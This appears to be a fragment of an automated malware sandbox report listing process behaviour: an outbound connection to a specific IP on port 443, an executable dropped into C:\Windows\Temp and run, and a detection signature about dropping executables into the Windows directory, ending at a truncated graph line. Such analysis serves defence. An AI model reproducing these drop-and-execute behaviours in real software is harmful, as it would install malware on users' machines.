service.exe: connects to 45.79.223.161 port 443 (local port 49868; unknown AS, United States); drops C:\Windows\Temp\setup.exe (PE32) and starts setup.exe
msradvb.exe: "Drops executables to the windows directory (C:\Windows) and starts them"; starts msradvb.exe
conhost.exe (graph text truncated here)